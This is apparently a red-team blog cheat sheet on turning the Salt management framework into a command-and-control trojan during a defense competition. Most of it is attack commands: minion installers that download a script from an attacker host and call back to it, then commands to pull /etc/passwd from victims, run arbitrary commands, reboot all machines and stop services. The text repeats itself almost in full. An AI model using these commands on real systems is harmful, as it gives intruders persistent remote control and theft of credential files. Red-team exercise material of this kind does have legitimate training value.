Salt Command and Control Cheat Sheet
Recently, as an experiment, I used the Salt framework as a malicious command and control (C&C or C2) infrastructure at NCCDC. It was really successful, and made for a highly reliable and manageable remote access trojan. There is a ton of great documentation already out there on Salt, but I wanted to take a minute to jot down some of my notes for future C2 excellence.
I had most of my stuff staged on a local network, such that it would be easy to install and call back to the master without having to traverse The Internet. I also had my server set up to auto-accept all keys, so I could receive callbacks and execute commands quickly without having to bother with accepting keys (salt-key -L / salt-key -A). As each box would connect back, I would try to give it a unique name based on hostname and when it was connecting back. Once on a box, I would attempt to install my minions as quickly as possible, typically with one of the following one liners ready to go (broken out here). After that, your off to the races with your botnet army!
PS C:\ > $name = "win_"+$(hostname)+"_"+$(Get-Date -Format s)
PS C:\ > Salt-Minion-x64.exe /S /master=10.0.0.2 /minion-name=$name /start-service=1
On Linux w/ apt-get:
$ apt-get install salt-minion salt-common
$ wget http://10.0.0.2/minion
$ mv ./minion /etc/salt/minion
$ sudo service salt-minion start
Or install from a script:
$ wget http://10.0.0.2/saltmin.sh
$ chmod +x saltmin.sh
$ NOW=$(date +"%m-%d-%YT%k:%M:%S")
$ saltmin.sh -P -I -i "linux_`hostname`_`echo $NOW`" -A 10.0.0.2
salt-run manage.up
Show minions that are down:
salt-run manage.down
Show all minions status:
salt-run manage.status
Test all minions connectivity:
salt '*' test.ping
Check if a process is running on all minions:
salt '*' ps.grep apache
Check if a file on all minions contains a string:
salt "*" file.contains /etc/password "admin"
Pull a file from a subgroup of minions:
salt "linux*" cp.push /etc/passwd
Send a file from the master to a subgroup of minions:
salt-cp "linux*" script_to_copy.py /target-dir/copy_of_script.py
Run arbitrary commands on a subgroup of minions:
salt "linux*" cmd.run "ls -lah /home/"
Get networking info from all minions:
salt '*' network.ip_addrs
More available network modules:
network.ping, network.traceroute, network.get_hostname, network.mod_hostname
Get uptime of all minions:
salt '*' status.uptime
Reboot all minions:
salt '*' system.reboot
Service status:
salt '*' service.status
salt '*' service.start httpd
salt '*' service.stop httpd
I had most of my stuff staged on a local network, such that it would be easy to install and call back to the master without having to traverse The Internet. I also had my server set up to auto-accept all keys, so I could receive callbacks and execute commands quickly without having to bother with accepting keys (salt-key -L / salt-key -A). As each box would connect back, I would try to give it a unique name based on hostname and when it was connecting back. Once on a box, I would attempt to install my minions as quickly as possible, typically with one of the following one liners ready to go (broken out here). After that, your off to the races with your botnet army!
Minion Installers
On Windows:PS C:\ > $name = "win_"+$(hostname)+"_"+$(Get-Date -Format s)
PS C:\ > Salt-Minion-x64.exe /S /master=10.0.0.2 /minion-name=$name /start-service=1
On Linux w/ apt-get:
$ apt-get install salt-minion salt-common
$ wget http://10.0.0.2/minion
$ mv ./minion /etc/salt/minion
$ sudo service salt-minion start
Or install from a script:
$ wget http://10.0.0.2/saltmin.sh
$ chmod +x saltmin.sh
$ NOW=$(date +"%m-%d-%YT%k:%M:%S")
$ saltmin.sh -P -I -i "linux_`hostname`_`echo $NOW`" -A 10.0.0.2
Command Execution
Show which minions that are up:salt-run manage.up
Show minions that are down:
salt-run manage.down
Show all minions status:
salt-run manage.status
Test all minions connectivity:
salt '*' test.ping
Check if a process is running on all minions:
salt '*' ps.grep apache
Check if a file on all minions contains a string:
salt "*" file.contains /etc/password "admin"
Pull a file from a subgroup of minions:
salt "linux*" cp.push /etc/passwd
Send a file from the master to a subgroup of minions:
salt-cp "linux*" script_to_copy.py /target-dir/copy_of_script.py
Run arbitrary commands on a subgroup of minions:
salt "linux*" cmd.run "ls -lah /home/"
Get networking info from all minions:
salt '*' network.ip_addrs
More available network modules:
network.ping, network.traceroute, network.get_hostname, network.mod_hostname
Get uptime of all minions:
salt '*' status.uptime
Reboot all minions:
salt '*' system.reboot
Service status:
salt '*' service.status
salt '*' service.start httpd
salt '*' service.stop httpd